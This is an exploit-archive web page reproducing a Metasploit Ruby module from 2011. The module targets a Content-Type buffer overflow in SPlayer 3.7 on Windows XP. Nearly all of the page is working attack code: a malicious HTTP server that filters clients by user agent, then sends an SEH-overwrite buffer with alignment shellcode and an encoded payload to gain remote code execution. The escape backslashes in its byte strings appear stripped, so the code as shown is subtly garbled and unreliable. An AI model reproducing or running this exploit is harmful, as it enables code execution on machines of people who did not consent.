Home / exploitsPDF  

SPlayer 3.7 Content-Type Buffer Overflow

Posted on 12 May 2011

##
# $Id: splayer_content_type.rb 12582 2011-05-11 11:33:16Z swtornio $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking

include Msf::Exploit::Remote::HttpServer::HTML

def initialize(info={})
super(update_info(info,
'Name'           => "SPlayer 3.7 Content-Type Buffer Overflow",
'Description'    => %q{
This module exploits a vulnerability in SPlayer v3.7 or piror.  When SPlayer
requests the URL of a media file (video or audio), it is possible to gain arbitrary
remote code execution due to a buffer overflow caused by an exceeding length of data
as the 'Content-Type' parameter.
},
'License'        => MSF_LICENSE,
'Version'        => "$Revision: 12582 $",
'Author'         =>
[
'xsploitedsec <xsploitedsecurity[at]gmail.com>',  #Initial discovery, PoC
'sinn3r', #Metasploit
],
'References'     =>
[
['OSVDB', '72181'],
['URL', 'http://www.exploit-db.com/exploits/17243/'],
],
'Payload'        =>
{
'BadChars'        => "x00x0ax0dx80x82x83x84x85x86x87x88x89x8ax8bx8cx8dx8ex8fx91x92x93x94x95x96x97x98x99x9ax9bx9cx9dx9ex9f",
'StackAdjustment' => -3500,
'EncoderType'     => Msf::Encoder::Type::AlphanumMixed,
'BufferRegister'  => 'ECX',
},
'DefaultOptions'  =>
{
'ExitFunction'         => "seh",
'InitialAutoRunScript' => 'migrate -f',
},
'Platform'       => 'win',
'Targets'        =>
[
[
'Windows XP SP2/XP3',
{
'Offset' => 2073,    #Offset to SEH
'Ret'    => 0x7325,  #Unicode P/P/R (splayer.exe)
'Max'    => 30000,   #Max buffer size
}
],
],
'Privileged'     => false,
'DisclosureDate' => "May 4 2011",
'DefaultTarget'  => 0))
end

def get_unicode_payload(p)
encoder = framework.encoders.create("x86/unicode_mixed")
encoder.datastore.import_options_from_hash( {'BufferRegister'=>'EAX'} )
unicode_payload = encoder.encode(p, nil, nil, platform)
return unicode_payload
end

def on_request_uri(cli, request)

agent = request.headers['User-Agent']
if agent !~ /Media Player Classic/
send_not_found(cli)
print_error("#{cli.peerhost}:#{cli.peerport} Unknown user-agent")
return
end

nop = "x73"

#MOV EAX,EDI; XOR AL,C3; INC EAX; XOR AL,79; PUSH EAX; POP ECX; JMP SHORT 0x40
alignment = "x8bxc7x34xc3x40x34x79x50x59xebx40"
padding = nop*6
p = get_unicode_payload(alignment + padding + payload.encoded)

sploit = rand_text_alpha(2073)
sploit << "x61x73"
sploit << "x25x73"
sploit << nop
sploit << "x55"
sploit << nop
sploit << "x58"
sploit << nop
sploit << "x05x19x11"
sploit << nop
sploit << "x2dx11x11"
sploit << nop
sploit << "x50"
sploit << nop
sploit << "x50"
sploit << nop
sploit << "x5f"
sploit << nop
sploit << "xc3"
sploit << rand_text_alpha(1000)
sploit << p
sploit << rand_text_alpha(target['Max']-sploit.length)

print_status("Sending malicious content-type to #{cli.peerhost}:#{cli.peerport}...")
send_response(cli, '', {'Content-Type'=>sploit})

end

end

 

TOP

Malware :

Exploits :